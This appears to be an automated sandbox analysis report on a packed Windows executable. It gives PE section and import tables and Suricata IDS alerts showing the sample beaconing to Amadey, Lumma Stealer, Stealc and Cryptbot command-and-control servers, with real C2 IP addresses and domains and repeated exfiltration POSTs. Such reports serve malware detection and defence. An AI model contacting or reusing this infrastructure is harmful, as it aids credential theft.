add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x344	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31ffe8	0x10	dvclnttf
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31ff98	0x18	dvclnttf
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	6a1dcebc532bf886f44b6ac3097f74ac	False	0.9983076464577657	data	7.9859445978174755	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x344	0x400	982623c07c43a8169da5c3bd55ce4d06	False	0.4345703125	data	5.395849414192414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dvclnttf	0x6b000	0x2b5000	0x2b5000	dcdb23c3d232229b6bb3bce063d3b324	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
migevdii	0x320000	0x1000	0x600	458f4adc8d7ee4a2c6a0a62412d6286c	False	0.5638020833333334	data	4.993586319841114	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x321000	0x3000	0x2200	ad58a3720e7685cf803ca7640648c8ff	False	0.057904411764705885	DOS executable (COM)	0.7017390348168908	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x152	ASCII text, with CRLF line terminators			0.6479289940828402
RT_MANIFEST	0x691c4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T11:03:05.156124+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49772	185.215.113.43	80	TCP
2024-12-16T11:03:09.622524+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49783	31.41.244.11	80	TCP
2024-12-16T11:03:13.479476+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	49779	TCP
2024-12-16T11:03:14.833169+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49796	185.215.113.43	80	TCP
2024-12-16T11:03:16.139307+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.5	58075	1.1.1.1	53	UDP
2024-12-16T11:03:16.139307+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.5	58075	1.1.1.1	53	UDP
2024-12-16T11:03:16.278589+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49800	31.41.244.11	80	TCP
2024-12-16T11:03:16.367670+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.5	63000	1.1.1.1	53	UDP
2024-12-16T11:03:16.367670+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.5	63000	1.1.1.1	53	UDP
2024-12-16T11:03:16.665182+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.5	51658	1.1.1.1	53	UDP
2024-12-16T11:03:16.665182+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.5	51658	1.1.1.1	53	UDP
2024-12-16T11:03:16.893085+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.5	61631	1.1.1.1	53	UDP
2024-12-16T11:03:16.893085+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.5	61631	1.1.1.1	53	UDP
2024-12-16T11:03:17.686821+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.5	60470	1.1.1.1	53	UDP
2024-12-16T11:03:17.686821+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.5	60470	1.1.1.1	53	UDP
2024-12-16T11:03:17.909685+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.5	50135	1.1.1.1	53	UDP
2024-12-16T11:03:17.909685+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.5	50135	1.1.1.1	53	UDP
2024-12-16T11:03:18.204353+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.5	61035	1.1.1.1	53	UDP
2024-12-16T11:03:18.204353+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.5	61035	1.1.1.1	53	UDP
2024-12-16T11:03:18.421681+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.5	64130	1.1.1.1	53	UDP
2024-12-16T11:03:18.421681+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.5	64130	1.1.1.1	53	UDP
2024-12-16T11:03:20.417104+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49811	23.37.186.133	443	TCP
2024-12-16T11:03:21.489594+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49811	23.37.186.133	443	TCP
2024-12-16T11:03:27.021042+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49827	185.215.113.43	80	TCP
2024-12-16T11:03:28.470129+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49833	31.41.244.11	80	TCP
2024-12-16T11:03:39.474880+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49861	185.215.113.43	80	TCP
2024-12-16T11:03:40.925782+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49864	31.41.244.11	80	TCP
2024-12-16T11:03:45.657486+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49878	185.215.113.43	80	TCP
2024-12-16T11:03:47.123628+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49881	185.215.113.16	80	TCP
2024-12-16T11:03:52.180319+0100	2058230	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)	1	192.168.2.5	53978	1.1.1.1	53	UDP
2024-12-16T11:03:53.642960+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:03:53.642960+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:03:54.167212+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49902	185.215.113.43	80	TCP
2024-12-16T11:03:55.736682+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49906	185.215.113.16	80	TCP
2024-12-16T11:03:56.058539+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:03:56.058539+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:03:56.603479+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49908	116.203.12.114	443	TCP
2024-12-16T11:03:56.604030+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.12.114	443	192.168.2.5	49908	TCP
2024-12-16T11:03:57.289012+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:03:57.289012+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:03:58.759759+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:03:58.759759+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:03:58.928033+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.12.114	443	192.168.2.5	49916	TCP
2024-12-16T11:04:00.376264+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49922	141.8.192.141	80	TCP
2024-12-16T11:04:00.456624+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49924	104.21.50.161	443	TCP
2024-12-16T11:04:00.456624+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49924	104.21.50.161	443	TCP
2024-12-16T11:04:02.194521+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	49931	141.8.192.141	80	TCP
2024-12-16T11:04:06.532187+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49949	104.21.50.161	443	TCP
2024-12-16T11:04:06.532187+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49949	104.21.50.161	443	TCP
2024-12-16T11:04:07.751334+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:07.751334+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:08.152881+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49949	104.21.50.161	443	TCP
2024-12-16T11:04:09.392019+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49960	185.215.113.43	80	TCP
2024-12-16T11:04:10.168214+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:10.168214+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:10.310751+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49970	104.21.50.161	443	TCP
2024-12-16T11:04:10.310751+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49970	104.21.50.161	443	TCP
2024-12-16T11:04:10.864368+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49974	185.215.113.16	80	TCP
2024-12-16T11:04:11.637270+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49976	185.215.113.206	80	TCP
2024-12-16T11:04:11.879001+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49979	104.21.50.161	443	TCP
2024-12-16T11:04:11.879001+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49979	104.21.50.161	443	TCP
2024-12-16T11:04:13.372905+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49979	104.21.50.161	443	TCP
2024-12-16T11:04:13.372905+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49979	104.21.50.161	443	TCP
2024-12-16T11:04:15.683047+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49994	104.21.50.161	443	TCP
2024-12-16T11:04:15.683047+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49994	104.21.50.161	443	TCP
2024-12-16T11:04:16.233064+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49996	104.21.50.161	443	TCP
2024-12-16T11:04:16.233064+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49996	104.21.50.161	443	TCP
2024-12-16T11:04:16.394074+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	49998	104.21.50.161	443	TCP
2024-12-16T11:04:16.394074+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49998	104.21.50.161	443	TCP
2024-12-16T11:04:16.836716+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49994	104.21.50.161	443	TCP
2024-12-16T11:04:16.836716+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49994	104.21.50.161	443	TCP
2024-12-16T11:04:16.851410+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49999	185.215.113.43	80	TCP
2024-12-16T11:04:18.108295+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50007	104.21.50.161	443	TCP
2024-12-16T11:04:18.108295+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50007	104.21.50.161	443	TCP
2024-12-16T11:04:18.325264+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50005	185.215.113.16	80	TCP
2024-12-16T11:04:18.968897+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50012	104.21.50.161	443	TCP
2024-12-16T11:04:18.968897+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50012	104.21.50.161	443	TCP
2024-12-16T11:04:20.176805+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50015	104.21.50.161	443	TCP
2024-12-16T11:04:20.176805+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50015	104.21.50.161	443	TCP
2024-12-16T11:04:20.189604+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50015	104.21.50.161	443	TCP
2024-12-16T11:04:23.412435+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50007	104.21.50.161	443	TCP
2024-12-16T11:04:23.412435+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50007	104.21.50.161	443	TCP
2024-12-16T11:04:25.076209+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50032	104.21.50.161	443	TCP
2024-12-16T11:04:25.076209+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50032	104.21.50.161	443	TCP
2024-12-16T11:04:26.907501+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50041	104.21.50.161	443	TCP
2024-12-16T11:04:26.907501+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50041	104.21.50.161	443	TCP
2024-12-16T11:04:27.033554+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50040	185.215.113.43	80	TCP
2024-12-16T11:04:27.718646+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50041	104.21.50.161	443	TCP
2024-12-16T11:04:28.539689+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50048	31.41.244.11	80	TCP
2024-12-16T11:04:29.192516+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50052	185.215.113.16	80	TCP
2024-12-16T11:04:30.222163+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50063	104.21.50.161	443	TCP
2024-12-16T11:04:30.222163+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50063	104.21.50.161	443	TCP
2024-12-16T11:04:30.640991+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50066	104.21.50.161	443	TCP
2024-12-16T11:04:30.640991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50066	104.21.50.161	443	TCP
2024-12-16T11:04:30.895394+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50062	185.215.113.206	80	TCP
2024-12-16T11:04:32.475287+0100	2856121	ETPRO MALWARE Amadey CnC Activity M2	1	192.168.2.5	50068	185.215.113.43	80	TCP
2024-12-16T11:04:35.694293+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50091	104.21.50.161	443	TCP
2024-12-16T11:04:35.694293+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50091	104.21.50.161	443	TCP
2024-12-16T11:04:35.700095+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50091	104.21.50.161	443	TCP
2024-12-16T11:04:36.012939+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50092	104.21.50.161	443	TCP
2024-12-16T11:04:36.012939+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50092	104.21.50.161	443	TCP
2024-12-16T11:04:40.649447+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50098	104.21.50.161	443	TCP
2024-12-16T11:04:40.649447+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50098	104.21.50.161	443	TCP
2024-12-16T11:04:41.070552+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50099	104.21.50.161	443	TCP
2024-12-16T11:04:41.070552+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50099	104.21.50.161	443	TCP
2024-12-16T11:04:42.082900+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50099	104.21.50.161	443	TCP
2024-12-16T11:04:43.389374+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50101	104.21.50.161	443	TCP
2024-12-16T11:04:43.389374+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50101	104.21.50.161	443	TCP
2024-12-16T11:04:43.561869+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50102	185.215.113.16	80	TCP
2024-12-16T11:04:44.292319+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	50103	141.8.192.141	80	TCP
2024-12-16T11:04:45.922737+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50105	104.21.50.161	443	TCP
2024-12-16T11:04:45.922737+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50105	104.21.50.161	443	TCP
2024-12-16T11:04:45.931575+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50105	104.21.50.161	443	TCP
2024-12-16T11:04:45.931575+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50105	104.21.50.161	443	TCP
2024-12-16T11:04:47.524230+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50106	185.215.113.206	80	TCP
2024-12-16T11:04:50.404359+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.5	50109	104.21.50.161	443	TCP
2024-12-16T11:04:50.404359+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50109	104.21.50.161	443	TCP
2024-12-16T11:04:51.520861+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50109	104.21.50.161	443	TCP
2024-12-16T11:04:53.132309+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50112	185.215.113.16	80	TCP
2024-12-16T11:04:54.177028+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50113	185.215.113.206	80	TCP
2024-12-16T11:05:00.952137+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50146	185.215.113.206	80	TCP
2024-12-16T11:05:04.418862+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50152	185.215.113.206	80	TCP
2024-12-16T11:08:09.347290+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	50290	185.215.113.43	80	TCP
2024-12-16T11:09:19.996712+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50318	31.41.244.11	80	TCP
2024-12-16T11:09:29.389321+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50317	TCP
2024-12-16T11:09:30.736397+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50319	185.215.113.43	80	TCP
2024-12-16T11:09:46.717098+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50323	TCP
2024-12-16T11:09:48.051581+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50326	185.215.113.43	80	TCP
2024-12-16T11:10:17.588305+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	50338	194.87.47.99	80	TCP
2024-12-16T11:10:19.223013+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	50340	194.87.47.99	80	TCP
2024-12-16T11:10:28.555387+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	50357	194.87.47.99	80	TCP
2024-12-16T11:11:22.132970+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50379	TCP
2024-12-16T11:11:23.124759+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.5	54286	1.1.1.1	53	UDP
2024-12-16T11:11:23.124759+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.5	54286	1.1.1.1	53	UDP
2024-12-16T11:11:23.264300+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.5	63149	1.1.1.1	53	UDP
2024-12-16T11:11:23.264300+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.5	63149	1.1.1.1	53	UDP
2024-12-16T11:11:23.405356+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.5	53347	1.1.1.1	53	UDP
2024-12-16T11:11:23.405356+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.5	53347	1.1.1.1	53	UDP
2024-12-16T11:11:23.485779+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50381	185.215.113.43	80	TCP
2024-12-16T11:11:23.545684+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.5	52473	1.1.1.1	53	UDP
2024-12-16T11:11:23.545684+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.5	52473	1.1.1.1	53	UDP
2024-12-16T11:11:23.685398+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.5	51992	1.1.1.1	53	UDP
2024-12-16T11:11:23.685398+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.5	51992	1.1.1.1	53	UDP
